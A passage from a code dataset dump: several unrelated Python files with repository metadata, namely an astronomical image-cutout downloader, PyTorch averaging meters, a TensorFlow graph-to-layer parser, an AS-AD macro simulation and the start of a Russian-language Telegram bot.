return self._env[key] | 33.136752 | 111 | 0.686613 | 542 | 3,877 | 4.523985 | 0.197417 | 0.068516 | 0.062398 | 0.131729 | 0.549347 | 0.424551 | 0.290783 | 0.128874 | 0.070962 | 0.042414 | 0 | 0.005491 | 0.201444 | 3,877 | 117 | 112 | 33.136752 | 0.786499 | 0.026309 | 0 | 0.048193 | 0 | 0 | 0.316097 | 0.144789 | 0 | 0 | 0 | 0.008547 | 0 | 1 | 0.108434 | false | 0.012048 | 0.120482 | 0.024096 | 0.301205 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e7c7bbf20a84fbc8017daf22376e9600de397fa | 9,455 | py | Python | scripts/retrieve_image_cutouts.py | nithyanandan/AstroUtils | 97473f52d4247bb9c8507598899215d0662e8d6f | [
"MIT"
] | 1 | 2018-10-31T03:49:39.000Z | 2018-10-31T03:49:39.000Z | scripts/retrieve_image_cutouts.py | nithyanandan/AstroUtils | 97473f52d4247bb9c8507598899215d0662e8d6f | [
"MIT"
] | 5 | 2017-11-18T01:45:50.000Z | 2020-05-30T12:26:50.000Z | scripts/retrieve_image_cutouts.py | nithyanandan/AstroUtils | 97473f52d4247bb9c8507598899215d0662e8d6f | [
"MIT"
] | 1 | 2019-10-14T08:44:40.000Z | 2019-10-14T08:44:40.000Z | #!python
import os.path
import numpy as NP
import yaml, argparse, warnings
from astroquery.skyview import SkyView
from astropy.coordinates import SkyCoord
from astropy import units as U
from astropy.io import ascii, fits
from astropy.table import Table
import astroutils
astroutils_path = astroutils.__path__[0]+'/'
if __name__ == '__main__':
## Parse input arguments
parser = argparse.ArgumentParser(description='Program to retrieve image cutouts')
input_group = parser.add_argument_group('Input parameters', 'Input specifications')
input_group.add_argument('-i', '--infile', dest='infile', default=astroutils_path+'examples/image_cutout/image_cutout_parms.yaml', type=str, required=False, help='File specifying input parameters for retrieving image cutouts')
args = vars(parser.parse_args())
with open(args['infile'], 'r') as parms_file:
parms = yaml.safe_load(parms_file)
projectdir = parms['dirStruct']['projectdir']
outdir = projectdir + parms['dirStruct']['outdir']
coordinfo = parms['coordinates']
catalogfile = coordinfo['infile']
ra_colname = coordinfo['RA_colname']
dec_colname = coordinfo['Dec_colname']
if coordinfo['RA_units'] == 'hms':
ra_units = U.hourangle
if (coordinfo['Dec_units'] == 'dms') or (coordinfo['Dec_units'] == 'deg'):
dec_units = U.deg
catalog = ascii.read(catalogfile)
ra = catalog[ra_colname]
dec = catalog[dec_colname]
coords = SkyCoord(ra, dec, unit=(ra_units, dec_units), equinox=coordinfo['epoch'], frame='icrs')
subsetinfo = parms['subset']
subparnames = subsetinfo['parmnames']
select = NP.ones(len(catalog), dtype=NP.bool)
if len(subparnames) > 0:
parmranges = subsetinfo['parmrange']
for i,prm in enumerate(subparnames):
subdat = catalog[prm]
if (subdat.dtype == NP.float) or (subdat.dtype == NP.int):
select[NP.logical_or(subdat < parmranges[i][0], subdat > parmranges[i][1])] = False
else:
for prmstr in parmranges[i]:
if prmstr[0] == '!':
pstr = prmstr[1:]
select = NP.logical_and(select, NP.logical_not(NP.asarray([pstr in subdat[j] for j in range(len(subdat))])))
else:
pstr = prmstr
select = NP.logical_and(select, NP.asarray([pstr in subdat[j] for j in range(len(subdat))]))
select_ind = NP.where(select)[0]
imgparms = parms['image']
survey = imgparms['survey']
projection = imgparms['projection']
pixels = imgparms['pixels']
action = imgparms['action']
overwrite = imgparms['overwrite']
if action.lower() == 'download':
failure_count = 0
failed_coords = []
for ii,ind in enumerate(select_ind):
radec_hmsdms = coords[ind].to_string('hmsdms')
outfname = outdir + '{0}_{1[0]:0d}x{1[1]:0d}.fits'.format(radec_hmsdms.replace(' ',''), pixels)
if (not os.path.isfile(outfname)) or overwrite:
try:
paths = SkyView.get_images(radec_hmsdms, survey=survey, pixels=pixels, coordinates=coordinfo['epoch'], projection=projection)
hdulist = paths[0][0]
hdulist.writeto(outfname, overwrite=True, output_verify='warn')
print('Successfully saved {0} [{1:0d}/{2:0d}]'.format(outfname, ii+1, select_ind.size))
except Exception as err:
warnings.warn('Problem with retrieving image at {0}.\nEncountered error: {1}.\nProceeding to the next object...\n'.format(radec_hmsdms, err.message), Warning)
if isinstance(err, AttributeError):
# For some reason, timeouts come under Attribute Error.
# There will be retries on these failures, but not others
# such as pointing outside the survey area, etc.
failure_count += 1
failed_coords += [radec_hmsdms]
if failure_count > 0:
# Process the failures
failurefile = projectdir + parms['failure']['failurefile']
n_retry = parms['failure']['retry']
success_coords = []
if n_retry > 0:
# Retry the failed retrievals
for iretry in range(n_retry):
if len(success_coords) < len(failed_coords):
for indfail, failcoord in enumerate(failed_coords):
if failcoord not in success_coords:
outfname = outdir + '{0}_{1[0]:0d}x{1[1]:0d}.fits'.format(failcoord.replace(' ',''), pixels)
try:
paths = SkyView.get_images(failcoord, survey=survey, pixels=pixels, coordinates=coordinfo['epoch'], projection=projection)
hdulist = paths[0][0]
hdulist.writeto(outfname, overwrite=True, output_verify='warn')
except Exception as err:
warnings.warn('Problem with retrieving image at {0}.\nEncountered error: {1}.\nProceeding to the next object...\n'.format(failcoord, err.message), Warning)
else: # Successful retrieval
failure_count -= 1
success_coords += [failcoord]
if len(success_coords) < len(failed_coords):
# Write information about failed retrievals to a file
print('Failed to retrieve {0:0d}/{1:0d} images. Failed coordinates listed in {2}'.format(failure_count-len(success_coords), select_ind.size, failurefile))
final_failed_coords = NP.setdiff1d(failed_coords, success_coords)
NP.savetxt(failurefile, final_failed_coords, fmt='%s')
else: # just query for image locations
failure_count = 0
failed_coords = []
success_coords = []
paths = []
for ii,ind in enumerate(select_ind):
radec_hmsdms = coords[ind].to_string('hmsdms')
try:
imgfiles = SkyView.get_images(radec_hmsdms, survey=survey, pixels=pixels, coordinates=coordinfo['epoch'], projection=projection)
except Exception as err:
warnings.warn('Problem with retrieving image at {0}.\nEncountered error: {1}.\nProceeding to the next object...\n'.format(radec_hmsdms, err.message), Warning)
if isinstance(err, AttributeError):
# For some reason, timeouts come under Attribute Error.
# There will be retries on these failures, but not others
# such as pointing outside the survey area, etc.
failure_count += 1
failed_coords += [radec_hmsdms]
else:
paths += [SkyView.get_image_list(radec_hmsdms, survey=survey, pixels=pixels, coordinates=coordinfo['epoch'], projection=projection)[0]]
success_coords += [radec_hmsdms]
print('Successfully located {0} [{1:0d}/{2:0d}]'.format(radec_hmsdms, len(paths), select_ind.size))
if failure_count > 0:
# Process the failures
failurefile = projectdir + parms['failure']['failurefile']
n_retry = parms['failure']['retry']
if n_retry > 0:
# Retry the failed retrievals
for iretry in range(n_retry):
if len(success_coords) < len(failed_coords):
for indfail, failcoord in enumerate(failed_coords):
if failcoord not in success_coords:
try:
imgfiles = SkyView.get_images(failcoord, survey=survey, pixels=pixels, coordinates=coordinfo['epoch'], projection=projection)
except Exception as err:
warnings.warn('Problem with retrieving image at {0}.\nEncountered error: {1}.\nProceeding to the next object...\n'.format(failcoord, err.message), Warning)
else: # Successful retrieval
paths += [SkyView.get_image_list(failcoord, survey=survey, pixels=pixels, coordinates=coordinfo['epoch'], projection=projection)[0]]
failure_count -= 1
success_coords += [failcoord]
if len(success_coords) < len(failed_coords):
# Write information about failed retrievals to a file
print('Failed to retrieve {0:0d}/{1:0d} images. Failed coordinates listed in {2}'.format(failure_count-len(success_coords), select_ind.size, failurefile))
final_failed_coords = NP.setdiff1d(failed_coords, success_coords)
NP.savetxt(failurefile, final_failed_coords, fmt='%s')
outfname = outdir + 'image_locations.txt'
final_success_coords = [coord.replace(' ', '') for coord in success_coords]
outdata = Table([final_success_coords, paths], names=['RA-Dec', 'URL'])
ascii.write(outdata, outfname, overwrite=True)
| 51.666667 | 230 | 0.579059 | 1,014 | 9,455 | 5.268245 | 0.215976 | 0.043804 | 0.020217 | 0.026956 | 0.618869 | 0.593411 | 0.579184 | 0.579184 | 0.579184 | 0.579184 | 0 | 0.010489 | 0.314331 | 9,455 | 182 | 231 | 51.950549 | 0.813512 | 0.065362 | 0 | 0.481752 | 0 | 0.043796 | 0.137786 | 0.011454 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.065693 | 0 | 0.065693 | 0.029197 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e7f80c48ea0ad3af7aa369fcecffd5a6eb1a3ba | 2,147 | py | Python | reid/utils/meters.py | ZoRoronoa/Camera-Aware-Proxy | 352f900bbae330f18c2bfe2b3f2516fb4e31adea | [
"Apache-2.0"
] | 37 | 2021-02-05T11:49:17.000Z | 2022-03-13T15:42:40.000Z | reid/utils/meters.py | ZoRoronoa/Camera-Aware-Proxy | 352f900bbae330f18c2bfe2b3f2516fb4e31adea | [
"Apache-2.0"
] | 7 | 2021-03-30T01:33:40.000Z | 2022-03-24T07:54:33.000Z | reid/utils/meters.py | ZoRoronoa/Camera-Aware-Proxy | 352f900bbae330f18c2bfe2b3f2516fb4e31adea | [
"Apache-2.0"
] | 9 | 2021-03-06T02:43:55.000Z | 2022-03-26T07:32:19.000Z | from __future__ import absolute_import
import torch
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
class CatMeter:
'''
Concatenate Meter for torch.Tensor
'''
def __init__(self):
self.reset()
def reset(self):
self.val = None
def update(self, val):
if self.val is None:
self.val = val
else:
self.val = torch.cat([self.val, val], dim=0)
def get_val(self):
return self.val
def get_val_numpy(self):
return self.val.data.cpu().numpy()
class MultiItemAverageMeter:
def __init__(self):
self.content = {}
def update(self, val):
'''
:param val: dict, keys are strs, values are torch.Tensor or np.array
'''
for key in list(val.keys()):
value = val[key]
if key not in list(self.content.keys()):
self.content[key] = {'avg': value, 'sum': value, 'count': 1.0}
else:
self.content[key]['sum'] += value
self.content[key]['count'] += 1.0
self.content[key]['avg'] = self.content[key]['sum'] / self.content[key]['count']
def get_val(self):
keys = list(self.content.keys())
values = []
for key in keys:
try:
values.append(self.content[key]['avg'].data.cpu().numpy())
except:
values.append(self.content[key]['avg'])
return keys, values
def get_str(self):
result = ''
keys, values = self.get_val()
for key, value in zip(keys, values):
result += key
result += ': '
result += str(value)
result += '; '
return result
| 23.593407 | 96 | 0.509548 | 263 | 2,147 | 4.072243 | 0.243346 | 0.084967 | 0.104575 | 0.063492 | 0.153128 | 0.130719 | 0.076564 | 0.076564 | 0.076564 | 0.076564 | 0 | 0.010174 | 0.359106 | 2,147 | 90 | 97 | 23.855556 | 0.768169 | 0.071262 | 0 | 0.33871 | 0 | 0 | 0.021047 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.193548 | false | 0 | 0.032258 | 0.032258 | 0.33871 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e7fe42e15d58a7e1ef059e38eb976549da0eb6f | 12,940 | py | Python | graph.py | ARM-software/DeepFreeze | 57ca195ecac37bbacf1a17d62bd22d355ee8bcb6 | [
"MIT"
] | 35 | 2019-02-11T21:00:09.000Z | 2022-03-26T05:33:45.000Z | graph.py | patrickthomashansen/DeepFreeze | 57ca195ecac37bbacf1a17d62bd22d355ee8bcb6 | [
"MIT"
] | 2 | 2019-10-10T10:06:35.000Z | 2021-09-16T18:07:22.000Z | graph.py | patrickthomashansen/DeepFreeze | 57ca195ecac37bbacf1a17d62bd22d355ee8bcb6 | [
"MIT"
] | 18 | 2019-02-12T16:11:09.000Z | 2022-02-12T18:04:52.000Z | #!/usr/bin/env python
"""
Author: Patrick Hansen
Project: FixyNN
Defines Graph and Layer classes used for intermediate representation
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
import json
DEPTHWISE_SEPARABLE_CONV_2D = "ds_conv_2d"
DEPTHWISE_CONV_2D = "dw_conv_2d"
CONV_2D = "conv_2d"
DENSE = "dense"
MAX_POOL_2D = "max_pool_2d"
AVG_POOL_2D = "avg_pool_2d"
FLATTEN = "flatten"
LAYER_TYPES_CONV = [DEPTHWISE_SEPARABLE_CONV_2D, DEPTHWISE_CONV_2D, CONV_2D]
LAYER_TYPES_POOL = [MAX_POOL_2D, AVG_POOL_2D]
LAYER_TYPES_2D = LAYER_TYPES_CONV + LAYER_TYPES_POOL
LAYER_TYPES_TRAINABLE = LAYER_TYPES_CONV + [DENSE]
RELU = "Relu"
RELU6 = "Relu6"
SOFTMAX = None
SIGMOID = None
TANH = None
ACTIVATION_FUNCTIONS = [RELU, RELU6, SOFTMAX, SIGMOID, TANH]
def get_tf_graph_from_meta(meta_graph_filepath):
tf.train.import_meta_graph(meta_graph_filepath)
return tf.get_default_graph()
def get_tf_graph_from_pb(frozen_model_filepath):
with tf.io.gfile.GFile(frozen_model_filepath, 'rb') as f:
graph_def = tf.compat.v1.GraphDef()
graph_def.ParseFromString(f.read())
tf.compat.v1.import_graph_def(graph_def, name='')
return tf.compat.v1.get_default_graph()
def get_endpoints(endpoints_filepath, graph):
with open(endpoints_filepath, "r") as f:
endpoints_by_name = json.load(f)
endpoints = {k: graph.get_tensor_by_name(v) for k, v in endpoints_by_name.iteritems()}
return endpoints
def get_layer_name(tensor, endpoints):
"""Find the name given to the endpoint corresponding to node"""
for name, _tensor in endpoints.iteritems():
if tensor == _tensor:
return name
return None
def get_tensor_shape(tensor):
"""Returns the tensor shape as a ist of ints/None"""
shape = []
for size in tensor.shape:
try:
shape.append(int(size))
except:
shape.append(None)
return shape
def get_variable_from_graph(graph, ckpt, variable):
"""Extract the value of a variable from a checkpoint"""
with tf.Session(graph=graph) as sess:
if ckpt:
tf.train.Saver().restore(sess, ckpt)
return sess.run(variable)
class Graph():
def __init__(self, name):
self.name = name
self.layers = []
self.removed_layer_names = []
def __str__(self):
result = "GRAPH: %s\n" % self.name
ordered = self.get_ordered_layers()
ordered_names = [layer.name for layer in ordered]
result += "\tlayers: %s\n" % " -> ".join(ordered_names)
for layer in ordered:
result += "\t" +str(layer).replace("\n", "\n\t") + "\n"
return result
def add_layer(self, layer):
connections = layer.input_names + layer.output_names
for layer_name in self.removed_layer_names:
if layer_name in layer.input_names:
layer.input_names.remove(layer_name)
if layer_name in layer.output_names:
layer.output_names.remove(layer_name)
self.layers.append(layer)
def remove_layer(self, layer):
layer_name = layer.name
if layer in self.layers:
self.layers.remove(layer)
for layer in self.layers:
if layer_name in layer.input_names:
layer.input_names.remove(layer_name)
if layer_name in layer.output_names:
layer.output_names.remove(layer_name)
self.removed_layer_names.append(layer_name)
def find_layer(self, name):
for layer in self.layers:
if layer.name == name:
return layer
return None
def get_input_layer(self):
for layer in self.layers:
if not layer.input_names:
return layer
return None
def get_output_layer(self):
for layer in self.layers:
if not layer.output_names:
return layer
return None
def get_next_layer(self, cur_layer):
if cur_layer and cur_layer.output_names:
next_layer_name = cur_layer.output_names[0] # TODO: enable branching
next_layer = self.find_layer(next_layer_name)
return next_layer
else:
return None
def get_previous_layer(self, cur_layer):
if cur_layer and cur_layer.input_names:
previous_layer_name = cur_layer.input_names[0] # TODO: enable branching
previous_layer = self.find_layer(previous_layer_name)
return previous_layer
else:
return None
def get_ordered_layers(self):
ordered = []
cur_layer = self.get_input_layer()
while cur_layer:
ordered += [cur_layer]
cur_layer = self.get_next_layer(cur_layer)
return ordered
class Layer():
def __init__(self, name, endpoints, graph, ckpt):
self._endpoints = endpoints
self._tensor = self._endpoints[name]
self._layer_ops = self.__get_layer_ops()
self.name = name
self.op_type = self.__get_op_type()
self.adder_pipeline = 1 # with pipeline
self.bram_mult =1 # no bram multipliers
self.adder_tree = 1 # with adder_tree
self.input_names = self.__get_input_layer_names()
self.output_names = self.__get_output_layer_names()
self.input_shapes = self.__get_input_shapes()
self.output_shape = self.__get_output_shape()
if self.op_type in LAYER_TYPES_TRAINABLE:
self.weights = self.__get_weights(graph, ckpt)
self.bias = self.__get_bias(graph, ckpt)
if self.op_type in LAYER_TYPES_2D:
self.kernel_size = self.__get_kernel_size()
self.strides = self.__get_strides()
self.padding = self.__get_padding()
self.activation_function = self.__get_activation_function()
def __str__(self):
result = "LAYER: %s\n" % self.name
result += "\top type: %s\n" % self.op_type
result += "\tinputs: %s\n" % self.input_names
result += "\toutputs: %s\n" % self.output_names
result += "\tinput shapes: %s\n" % self.input_shapes
result += "\toutput shape: %s\n" % self.output_shape
result += "\tactivation function: %s\n" % self.activation_function
if self.op_type in LAYER_TYPES_TRAINABLE:
if self.op_type == DEPTHWISE_SEPARABLE_CONV_2D:
result += "\tdepthwise weights shape: %s\n" % (self.weights[0].shape,)
result += "\tpointwise weights shape: %s\n" % (self.weights[1].shape,)
else:
result += "\tweights shape: %s\n" % (self.weights.shape,)
result += "\tbias shape: %s\n" % (self.bias.shape,)
if self.op_type in LAYER_TYPES_2D:
result += "\tkernel size: %s\n" % (self.kernel_size,)
result += "\tstrides: %s\n" % (self.strides,)
result += "\tpadding: %s" % self.padding
return result
def __get_input_layer_names(self, tensor=None):
"""Return a list of all layer names that are direct inputs to this layer"""
if tensor == None:
tensor = self._tensor
inputs = []
for inp in tensor.op.inputs:
if inp in self._endpoints.values():
inputs += [get_layer_name(inp, self._endpoints)]
else:
inputs += self.__get_input_layer_names(inp)
return list(set(inputs))
def __get_output_layer_names(self):
"""Return a list of all layer names that are direct outputs of this layer"""
outputs = []
for name, tensor in self._endpoints.iteritems():
if self.name in self.__get_input_layer_names(tensor):
outputs += [name]
return outputs
def __get_layer_ops(self, tensor=None):
"""Return all list of all ops in this layer"""
if tensor == None:
tensor = self._tensor
layer_ops = [tensor.op]
for inp in tensor.op.inputs:
if not inp in self._endpoints.values():
layer_ops += self.__get_layer_ops(inp)
return list(set(layer_ops))
def __get_op_type(self):
"""Determine the operation type of this layer"""
layer_ops_types = [op.type for op in self._layer_ops]
if "DepthwiseConv2dNative" in layer_ops_types and \
"Conv2D" in layer_ops_types:
return DEPTHWISE_SEPARABLE_CONV_2D
elif "DepthwiseConv2dNative" in layer_ops_types:
return DEPTHWISE_CONV_2D
elif "Conv2D" in layer_ops_types:
return CONV_2D
elif "MatMul" in layer_ops_types:
return DENSE
elif "MaxPool" in layer_ops_types:
return MAX_POOL_2D
elif "AvgPool" in layer_ops_types:
return AVG_POOL_2D
elif "Reshape" in layer_ops_types:
return FLATTEN
else:
raise Exception("Could not match layer with a known op type")
def __get_ops_by_type(self, op_type):
if op_type == None:
return None
ops = []
for op in self._layer_ops:
if op.type == op_type:
ops.append(op)
return ops
def __get_input_shapes(self):
"""Return a list of all input activation tensor shapes to node"""
if not self.input_names:
tensor = self._tensor
while tensor.op.inputs:
shape = get_tensor_shape(tensor)
tensor = tensor.op.inputs[0]
if not get_tensor_shape(tensor) or \
(self.op_type in LAYER_TYPES_2D and len(get_tensor_shape(tensor)) != 4):
return [shape]
return [get_tensor_shape(tensor)]
else:
return [get_tensor_shape(self._endpoints[x]) for x in self.input_names]
def __get_output_shape(self):
return get_tensor_shape(self._tensor)
def __get_weights(self, graph, ckpt):
"""Extract weight parameters from a layer"""
# import pdb;pdb.set_trace()
if self.op_type == DEPTHWISE_SEPARABLE_CONV_2D:
depthwise_weights = self.__get_ops_by_type("DepthwiseConv2dNative")[0].inputs[1]
pointwise_weights = self.__get_ops_by_type("Conv2D")[0].inputs[1]
return [
get_variable_from_graph(graph, ckpt, depthwise_weights),
get_variable_from_graph(graph, ckpt, pointwise_weights)
]
elif self.op_type == DEPTHWISE_CONV_2D:
weights = self.__get_ops_by_type("DepthwiseConv2dNative")[0].inputs[1]
return get_variable_from_graph(graph, ckpt, weights)
elif self.op_type == CONV_2D:
weights = self.__get_ops_by_type("Conv2D")[0].inputs[1]
return get_variable_from_graph(graph, ckpt, weights)
elif self.op_type == DENSE:
weights = self.__get_ops_by_type("MatMul")[0].inputs[1]
return get_variable_from_graph(graph, ckpt, weights)
else:
raise Exception("No weights found in layer: %s" % self.name)
def __get_bias(self, graph, ckpt):
"""Extract bias parameters from a layer"""
bias = None
bias_add_ops = self.__get_ops_by_type("BiasAdd")
add_ops = self.__get_ops_by_type("Add")
if bias_add_ops:
assert(len(bias_add_ops) == 1)
bias = bias_add_ops[0].inputs[1]
if add_ops:
for op in add_ops:
if "bias" in op.inputs[1].name.lower():
bias = op.inputs[1]
if bias == None:
return np.zeros((self.output_shape[-1]))
else:
return get_variable_from_graph(graph, ckpt, bias)
def __get_batch_norm(self, graph, ckpt):
pass # TODO
def __get_2d_op(self):
"""Returns the desired 2d op for the given layer type"""
if self.op_type in [DEPTHWISE_SEPARABLE_CONV_2D, DEPTHWISE_CONV_2D]:
return self.__get_ops_by_type("DepthwiseConv2dNative")[0]
elif self.op_type == CONV_2D:
return self.__get_ops_by_type("Conv2D")[0]
elif self.op_type == MAX_POOL_2D:
return self.__get_ops_by_type("MaxPool")[0]
elif self.op_type == AVG_POOL_2D:
return self.__get_ops_by_type("AvgPool")[0]
else:
raise Exception("No 2d operations in layer: %s" % self.name)
def __get_kernel_size(self):
if self.op_type == DEPTHWISE_SEPARABLE_CONV_2D:
return self.weights[0].shape[0:2]
elif self.op_type in [DEPTHWISE_CONV_2D, CONV_2D]:
return self.weights.shape[0:2]
elif self.op_type in [MAX_POOL_2D, AVG_POOL_2D]:
op = self.__get_2d_op()
kernel_size = op.get_attr("ksize")
return (int(kernel_size[1]), int(kernel_size[2]))
else:
raise Exception("No kernel size for layer: %s" % self.name)
def __get_strides(self):
op = self.__get_2d_op()
strides = op.get_attr("strides")
return (int(strides[1]), int(strides[2]))
def __get_padding(self):
op = self.__get_2d_op()
padding = op.get_attr("padding")
return (padding)
def __get_activation_function(self):
for fn in ACTIVATION_FUNCTIONS:
if self.__get_ops_by_type(fn):
return fn
return None
def parse_tf_graph(
model_name, endpoints_filepath, meta_filepath, checkpoint_filepath, pb_filepath,
input_layer_name=None, output_layer_name=None
):
"""Parses a Tensorflow model into an intermediate representation"""
if pb_filepath is None:
assert(meta_filepath and checkpoint_filepath)
tf_graph = get_tf_graph_from_meta(meta_filepath)
else:
tf_graph = get_tf_graph_from_pb(pb_filepath)
endpoints = get_endpoints(endpoints_filepath, tf_graph)
graph = Graph(model_name)
for layer_name in endpoints.keys():
layer = Layer(layer_name, endpoints, tf_graph, checkpoint_filepath)
graph.add_layer(layer)
if input_layer_name is not None:
layer = graph.get_input_layer()
while layer.name != input_layer_name:
graph.remove_layer(layer)
layer = graph.get_input_layer()
if output_layer_name is not None:
layer = graph.get_output_layer()
while layer.name != output_layer_name:
graph.remove_layer(layer)
layer = graph.get_output_layer()
print(graph)
return graph
| 31.715686 | 87 | 0.708346 | 1,935 | 12,940 | 4.411886 | 0.116796 | 0.027059 | 0.023427 | 0.018273 | 0.383859 | 0.292492 | 0.226309 | 0.17922 | 0.109758 | 0.099684 | 0 | 0.009309 | 0.186476 | 12,940 | 407 | 88 | 31.793612 | 0.801653 | 0.06847 | 0 | 0.208589 | 0 | 0 | 0.060523 | 0.008765 | 0 | 0 | 0 | 0.002457 | 0.006135 | 1 | 0.104294 | false | 0.003067 | 0.02454 | 0.003067 | 0.300614 | 0.006135 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e80269c55cc32cafd338f05fdf62d0ccbc5eba4 | 2,059 | py | Python | numecon/course_macro1/asad.py | minjiedeng/NumEcon | ff021e765344db93eed7ff0002dbdf3e50e528e9 | [
"MIT"
] | 1 | 2021-10-03T12:23:34.000Z | 2021-10-03T12:23:34.000Z | numecon/course_macro1/asad.py | minjiedeng/NumEcon | ff021e765344db93eed7ff0002dbdf3e50e528e9 | [
"MIT"
] | null | null | null | numecon/course_macro1/asad.py | minjiedeng/NumEcon | ff021e765344db93eed7ff0002dbdf3e50e528e9 | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
import ipywidgets as widgets
def simulate(a=0.4,gamma=0.1,phi=0.9,delta=0.8,omega=0.15,sigma_x=1,sigma_c=0.2,T=100):
widgets.interact(simulate_,
a=widgets.fixed(a),
gamma=widgets.fixed(gamma),
phi=widgets.fixed(phi),
delta=widgets.fixed(delta),
omega=widgets.fixed(omega),
sigma_x=widgets.FloatSlider(description='$\\sigma_{x}$',min=0.00, max=2.0, step=0.01, value=sigma_x),
sigma_c=widgets.FloatSlider(description='$\\sigma_{c}$',min=0.00, max=2.0, step=0.01, value=sigma_c),
T=widgets.fixed(T),
)
def simulate_(a,phi,gamma,delta,omega,sigma_x,sigma_c,T):
np.random.seed(2015)
# a. parameters
b = (1+a*phi*gamma)/(1+a*gamma)
beta = 1/(1+a*gamma)
# b. function
y_hat_func = lambda y_hat_lag,z,z_lag,s,s_lag: b*y_hat_lag + beta*(z-z_lag) - a*beta*s + a*beta*phi*s_lag
pi_hat_func = lambda pi_lag,z,z_lag,s,s_lag: b*pi_lag + beta*gamma*z - beta*phi*gamma*z_lag + beta*s - beta*phi*s_lag
z_func = lambda z_lag,x: delta*z_lag + x
s_func = lambda s_lag,c: omega*s_lag + c
# c. simulation
x = np.random.normal(loc=0,scale=sigma_x,size=T)
c = np.random.normal(loc=0,scale=sigma_c,size=T)
z = np.zeros(T)
s = np.zeros(T)
y_hat = np.zeros(T)
pi_hat = np.zeros(T)
for t in range(1,T):
# i. update z and s
z[t] = z_func(z[t-1],x[t])
s[t] = s_func(s[t-1],c[t])
# ii. compute y og pi
y_hat[t] = y_hat_func(y_hat[t-1],z[t],z[t-1],s[t],s[t-1])
pi_hat[t] = pi_hat_func(pi_hat[t-1],z[t],z[t-1],s[t],s[t-1])
# d. figure
fig = plt.figure(figsize=(8,6),dpi=100)
ax = fig.add_subplot(1,1,1)
ax.plot(y_hat,label='$\\hat{y}$')
ax.plot(pi_hat,label='$\\hat{pi}$')
ax.set_xlabel('time')
ax.set_ylabel('percent')
ax.set_ylim([-8,8])
ax.grid(ls='--', lw=1)
legend = ax.legend(loc='upper left', shadow=True)
frame = legend.get_frame()
frame.set_facecolor('0.90')
| 30.731343 | 121 | 0.599806 | 397 | 2,059 | 2.964736 | 0.244332 | 0.027188 | 0.027188 | 0.057774 | 0.144435 | 0.144435 | 0.144435 | 0.096856 | 0.073067 | 0.073067 | 0 | 0.040516 | 0.208839 | 2,059 | 66 | 122 | 31.19697 | 0.682014 | 0.042739 | 0 | 0 | 0 | 0 | 0.037678 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0 | 0.068182 | 0 | 0.113636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e809f6f5b29b93323467c6edb423874635485e0 | 10,769 | py | Python | main.py | kik0908/TelegramBotAPI-Yandex | d3d44bb483a44f2d0c830ad7835ab3eb50dd8ceb | [
"MIT"
] | 5 | 2018-04-07T23:50:50.000Z | 2019-08-22T06:29:43.000Z | main.py | kik0908/TelegramBotAPI-Yandex | d3d44bb483a44f2d0c830ad7835ab3eb50dd8ceb | [
"MIT"
] | 1 | 2018-04-11T18:40:45.000Z | 2018-04-11T18:40:45.000Z | main.py | kik0908/TelegramBotAPI-Yandex | d3d44bb483a44f2d0c830ad7835ab3eb50dd8ceb | [
"MIT"
] | 1 | 2019-11-23T20:34:07.000Z | 2019-11-23T20:34:07.000Z | from random import choice, shuffle
from itertools import cycle
import pymorphy2
from telegram.ext import Updater, MessageHandler, Filters, CallbackQueryHandler, CommandHandler, ConversationHandler
from telegram import ReplyKeyboardMarkup, InlineKeyboardButton, InlineKeyboardMarkup
from geocoder import search, get_ll_span, get_coordinates
from weather_api import get_weather
from settings import TOKEN
places = {'спорт': ['стадион', 'дворец спорта', 'тренажёрный зал', 'бассейн'],
'культура': ['театр', 'музей', 'библиотека', 'дом культуры'],
'развлечения': ['клуб', 'кино', 'сауна', 'бар', 'караоке', 'квесты', 'боулинг', 'бильярдный зал', 'спортивно-тактические клубы'],
'медицина': ['больница', 'поликлиника', 'стоматология', 'травмпункт'],
'медтовары': ['аптека', 'медтовары'],
'животные': ['Товары для животных', 'ветеренарная клиника'],
'питание': ['кафе', 'ресторан', 'макдональдс', 'kfc', 'столовая', 'пиццерия', 'суши бар', 'банкетный зал'],
'религия': ['православный храм', 'мечеть', 'собор'],
'магазины': ['торговый центр', 'спорттовары', 'магазин одежды', 'детский магазин', 'канцтовары', 'книжный магазин'],
